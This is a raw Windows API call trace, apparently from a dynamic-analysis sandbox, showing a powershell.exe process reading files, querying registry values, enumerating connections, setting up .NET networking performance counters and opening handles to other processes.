	[0814.980] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce08, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dce08*=0x1000, lpOverlapped=0x0) returned 1
	[0814.981] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce08, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dce08*=0x1000, lpOverlapped=0x0) returned 1
	[0814.981] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce08, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dce08*=0x1000, lpOverlapped=0x0) returned 1
	[0814.981] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce08, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dce08*=0x1000, lpOverlapped=0x0) returned 1
	[0814.990] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcf48, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dcf48*=0x1000, lpOverlapped=0x0) returned 1
	[0814.990] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcdc8, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dcdc8*=0x22a, lpOverlapped=0x0) returned 1
	[0814.990] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce68, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dce68*=0x0, lpOverlapped=0x0) returned 1
	[0814.991] CloseHandle (hObject=0x374) returned 1
	[0814.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0814.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0814.993] CoTaskMemAlloc (cb=0x20c) returned 0x1b873bc0
	[0814.993] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b873bc0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0814.993] CoTaskMemFree (pv=0x1b873bc0) 
	[0814.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7dd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0814.993] GetCurrentProcess () returned 0xffffffffffffffff
	[0814.993] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5c8 | out: TokenHandle=0x1c7dd5c8*=0x374) returned 1
	[0814.995] GetCurrentProcess () returned 0xffffffffffffffff
	[0814.995] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5c8 | out: TokenHandle=0x1c7dd5c8*=0x370) returned 1
	[0814.997] GetCurrentProcess () returned 0xffffffffffffffff
	[0814.997] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd368 | out: TokenHandle=0x1c7dd368*=0x3ac) returned 1
	[0814.998] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd410 | out: lpFileInformation=0x1c7dd410*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0814.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dcf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0815.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3c0 | out: lpFileInformation=0x1c7dd3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0815.000] GetCurrentProcess () returned 0xffffffffffffffff
	[0815.000] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5c8 | out: TokenHandle=0x1c7dd5c8*=0x3b0) returned 1
	[0815.001] GetCurrentProcess () returned 0xffffffffffffffff
	[0815.001] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5c8 | out: TokenHandle=0x1c7dd5c8*=0x354) returned 1
	[0816.306] GetCurrentProcess () returned 0xffffffffffffffff
	[0816.306] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd248 | out: TokenHandle=0x1c7dd248*=0x37c) returned 1
	[0817.951] GetCurrentProcess () returned 0xffffffffffffffff
	[0817.951] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd248 | out: TokenHandle=0x1c7dd248*=0x380) returned 1
	[0819.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
	[0819.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0819.240] GetCurrentProcess () returned 0xffffffffffffffff
	[0819.240] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd218 | out: TokenHandle=0x1c7dd218*=0x38c) returned 1
	[0819.247] GetCurrentProcess () returned 0xffffffffffffffff
	[0819.247] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd218 | out: TokenHandle=0x1c7dd218*=0x390) returned 1
	[0820.304] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.304] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd158 | out: TokenHandle=0x1c7dd158*=0x394) returned 1
	[0820.312] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.312] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd158 | out: TokenHandle=0x1c7dd158*=0x3b4) returned 1
	[0820.319] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.319] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd798 | out: TokenHandle=0x1c7dd798*=0x398) returned 1
	[0820.330] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7db858 | out: phkResult=0x1c7db858*=0x3bc) returned 0x0
	[0820.330] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7db7dc, lpData=0x0, lpcbData=0x1c7db7d8*=0x0 | out: lpType=0x1c7db7dc*=0x1, lpData=0x0, lpcbData=0x1c7db7d8*=0xe) returned 0x0
	[0820.330] CoTaskMemAlloc (cb=0x12) returned 0x1b8b6410
	[0820.330] RegQueryValueExW (in: hKey=0x3bc, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7db7ac, lpData=0x1b8b6410, lpcbData=0x1c7db7a8*=0xe | out: lpType=0x1c7db7ac*=0x1, lpData="Client", lpcbData=0x1c7db7a8*=0xe) returned 0x0
	[0820.330] CoTaskMemFree (pv=0x1b8b6410) 
	[0820.330] RegCloseKey (hKey=0x3bc) returned 0x0
	[0822.095] CoTaskMemAlloc (cb=0xcd0) returned 0x1b8bdb50
	[0822.095] RasEnumConnectionsW (in: param_1=0x1b8bdb50, param_2=0x1c7dd7ec, param_3=0x1c7dd7e8 | out: param_1=0x1b8bdb50, param_2=0x1c7dd7ec, param_3=0x1c7dd7e8) returned 0x0
	[0822.101] CoTaskMemFree (pv=0x1b8bdb50) 
	[0822.108] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c7dd5f8 | out: lpWSAData=0x1c7dd5f8) returned 0
	[0822.117] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0822.124] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0822.124] closesocket (s=0x408) returned 0
	[0822.124] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408
	[0822.126] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0822.126] closesocket (s=0x408) returned 0
	[0824.547] GetCurrentProcess () returned 0xffffffffffffffff
	[0824.547] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dce78 | out: TokenHandle=0x1c7dce78*=0x408) returned 1
	[0824.560] GetCurrentProcess () returned 0xffffffffffffffff
	[0824.560] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dce78 | out: TokenHandle=0x1c7dce78*=0x40c) returned 1
	[0824.578] GetCurrentProcessId () returned 0xf10
	[0827.702] CoTaskMemAlloc (cb=0x204) returned 0x447220
	[0827.702] GetComputerNameW (in: lpBuffer=0x447220, nSize=0x2e2d5f8 | out: lpBuffer="XDUWTFONO", nSize=0x2e2d5f8) returned 1
	[0827.702] CoTaskMemFree (pv=0x447220) 
	[0827.703] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd358 | out: phkResult=0x1c7dd358*=0x410) returned 0x0
	[0827.703] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c7dd2dc, lpData=0x0, lpcbData=0x1c7dd2d8*=0x0 | out: lpType=0x1c7dd2dc*=0x1, lpData=0x0, lpcbData=0x1c7dd2d8*=0x1c) returned 0x0
	[0827.703] CoTaskMemAlloc (cb=0x20) returned 0x1b8c0b10
	[0827.703] RegQueryValueExW (in: hKey=0x410, lpValueName="Library", lpReserved=0x0, lpType=0x1c7dd2ac, lpData=0x1b8c0b10, lpcbData=0x1c7dd2a8*=0x1c | out: lpType=0x1c7dd2ac*=0x1, lpData="netfxperf.dll", lpcbData=0x1c7dd2a8*=0x1c) returned 0x0
	[0827.704] CoTaskMemFree (pv=0x1b8c0b10) 
	[0827.704] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7dd2dc, lpData=0x0, lpcbData=0x1c7dd2d8*=0x0 | out: lpType=0x1c7dd2dc*=0x4, lpData=0x0, lpcbData=0x1c7dd2d8*=0x4) returned 0x0
	[0827.705] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7dd2e0, lpData=0x1c7dd2dc, lpcbData=0x1c7dd2d8*=0x4 | out: lpType=0x1c7dd2e0*=0x4, lpData=0x1c7dd2dc*=0x1, lpcbData=0x1c7dd2d8*=0x4) returned 0x0
	[0827.705] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7dd2dc, lpData=0x0, lpcbData=0x1c7dd2d8*=0x0 | out: lpType=0x1c7dd2dc*=0x4, lpData=0x0, lpcbData=0x1c7dd2d8*=0x4) returned 0x0
	[0827.705] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7dd2e0, lpData=0x1c7dd2dc, lpcbData=0x1c7dd2d8*=0x4 | out: lpType=0x1c7dd2e0*=0x4, lpData=0x1c7dd2dc*=0x137a, lpcbData=0x1c7dd2d8*=0x4) returned 0x0
	[0827.705] RegCloseKey (hKey=0x410) returned 0x0
	[0827.709] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd318 | out: phkResult=0x1c7dd318*=0x410) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7dd29c, lpData=0x0, lpcbData=0x1c7dd298*=0x0 | out: lpType=0x1c7dd29c*=0x4, lpData=0x0, lpcbData=0x1c7dd298*=0x4) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7dd2a0, lpData=0x1c7dd29c, lpcbData=0x1c7dd298*=0x4 | out: lpType=0x1c7dd2a0*=0x4, lpData=0x1c7dd29c*=0x3, lpcbData=0x1c7dd298*=0x4) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7dd29c, lpData=0x0, lpcbData=0x1c7dd298*=0x0 | out: lpType=0x1c7dd29c*=0x4, lpData=0x0, lpcbData=0x1c7dd298*=0x4) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7dd2a0, lpData=0x1c7dd29c, lpcbData=0x1c7dd298*=0x4 | out: lpType=0x1c7dd2a0*=0x4, lpData=0x1c7dd29c*=0x20000, lpcbData=0x1c7dd298*=0x4) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7dd29c, lpData=0x0, lpcbData=0x1c7dd298*=0x0 | out: lpType=0x1c7dd29c*=0x3, lpData=0x0, lpcbData=0x1c7dd298*=0xaa) returned 0x0
	[0827.709] RegQueryValueExW (in: hKey=0x410, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7dd29c, lpData=0x2e308e8, lpcbData=0x1c7dd298*=0xaa | out: lpType=0x1c7dd29c*=0x3, lpData=0x2e308e8*, lpcbData=0x1c7dd298*=0xaa) returned 0x0
	[0827.713] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0827.717] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c7dd250, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0827.718] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418
	[0827.721] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x28f0000
	[0827.722] VirtualQuery (in: lpAddress=0x28f0000, lpBuffer=0x1c7dd248, dwLength=0x30 | out: lpBuffer=0x1c7dd248*(BaseAddress=0x28f0000, AllocationBase=0x28f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0827.722] LocalFree (hMem=0x1b8baee0) returned 0x0
	[0827.722] RegCloseKey (hKey=0x410) returned 0x0
	[0827.725] GetVersionExW (in: lpVersionInformation=0x1c7dc220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7dc220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0827.726] GetVersionExW (in: lpVersionInformation=0x1c7dc1f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7dc1f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0827.727] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e315b8, cbSid=0x1c7dd230 | out: pSid=0x2e315b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd230) returned 1
	[0827.730] CreateMutexW (lpMutexAttributes=0x2e317c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x410
	[0827.733] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0827.734] GetCurrentProcessId () returned 0xf10
	[0827.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x41c
	[0827.736] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd140, lpExitTime=0x1c7dd138, lpKernelTime=0x1c7dd130, lpUserTime=0x1c7dd128 | out: lpCreationTime=0x1c7dd140, lpExitTime=0x1c7dd138, lpKernelTime=0x1c7dd130, lpUserTime=0x1c7dd128) returned 1
	[0827.736] CloseHandle (hObject=0x41c) returned 1
	[0827.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x41c
	[0827.737] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8 | out: lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8) returned 1
	[0827.737] CloseHandle (hObject=0x41c) returned 1
	[0827.737] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x41c
	[0827.738] GetCurrentProcess () returned 0xffffffffffffffff
	[0827.738] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.672] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd128*=0x420) returned 1
	[0830.673] CloseHandle (hObject=0x420) returned 1
	[0830.674] CloseHandle (hObject=0x41c) returned 1
	[0830.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0830.674] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8 | out: lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8) returned 1
	[0830.674] CloseHandle (hObject=0x41c) returned 1
	[0830.674] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c
	[0830.674] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.674] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.674] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd128*=0x420) returned 1
	[0830.675] CloseHandle (hObject=0x420) returned 1
	[0830.675] CloseHandle (hObject=0x41c) returned 1
	[0830.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0830.675] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8 | out: lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8) returned 1
	[0830.675] CloseHandle (hObject=0x41c) returned 1
	[0830.675] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x41c
	[0830.675] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.675] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.675] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd128*=0x420) returned 1
	[0830.676] CloseHandle (hObject=0x420) returned 1
	[0830.676] CloseHandle (hObject=0x41c) returned 1
	[0830.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0830.676] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8 | out: lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8) returned 1
	[0830.676] CloseHandle (hObject=0x41c) returned 1
	[0830.676] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x41c
	[0830.677] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.677] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.677] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd128*=0x420) returned 1
	[0830.677] CloseHandle (hObject=0x420) returned 1
	[0830.677] CloseHandle (hObject=0x41c) returned 1
	[0830.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0830.677] GetProcessTimes (in: hProcess=0x41c, lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8 | out: lpCreationTime=0x1c7dd1d0, lpExitTime=0x1c7dd1c8, lpKernelTime=0x1c7dd1c0, lpUserTime=0x1c7dd1b8) returned 1
	[0830.678] CloseHandle (hObject=0x41c) returned 1
	[0830.678] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x41c
	[0830.678] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.678] GetCurrentProcess () returned 0xffffffffffffffff
	[0830.678] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7dd128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7dd128*=0x420) returned 1
	[0830.678] CloseHandle (hObject=0x420) returned 1
	[0830.678] CloseHandle (hObject=0x41c) returned 1
	[0830.680] ReleaseMutex (hMutex=0x410) returned 1
	[0830.680] CloseHandle (hObject=0x410) returned 1
	[0830.681] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e328a0, cbSid=0x1c7dd230 | out: pSid=0x2e328a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd230) returned 1
	[0830.681] CreateMutexW (lpMutexAttributes=0x2e32a58, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.683] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.683] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.684] ReleaseMutex (hMutex=0x410) returned 1
	[0830.684] CloseHandle (hObject=0x410) returned 1
	[0830.684] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e336e8, cbSid=0x1c7dd230 | out: pSid=0x2e336e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd230) returned 1
	[0830.684] CreateMutexW (lpMutexAttributes=0x2e338a0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.685] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.685] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.690] ReleaseMutex (hMutex=0x410) returned 1
	[0830.690] CloseHandle (hObject=0x410) returned 1
	[0830.690] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e34540, cbSid=0x1c7dd230 | out: pSid=0x2e34540*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd230) returned 1
	[0830.691] CreateMutexW (lpMutexAttributes=0x2e346f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.691] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.691] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.692] ReleaseMutex (hMutex=0x410) returned 1
	[0830.692] CloseHandle (hObject=0x410) returned 1
	[0830.692] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e35390, cbSid=0x1c7dd230 | out: pSid=0x2e35390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd230) returned 1
	[0830.692] CreateMutexW (lpMutexAttributes=0x2e35548, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.692] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.693] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.693] ReleaseMutex (hMutex=0x410) returned 1
	[0830.694] CloseHandle (hObject=0x410) returned 1
	[0830.696] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e361e0, cbSid=0x1c7dd1e0 | out: pSid=0x2e361e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd1e0) returned 1
	[0830.697] CreateMutexW (lpMutexAttributes=0x2e36398, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0830.697] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x410
	[0830.697] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0
	[0830.698] ReleaseMutex (hMutex=0x410) returned 1
	[0830.698] CloseHandle (hObject=0x410) returned 1
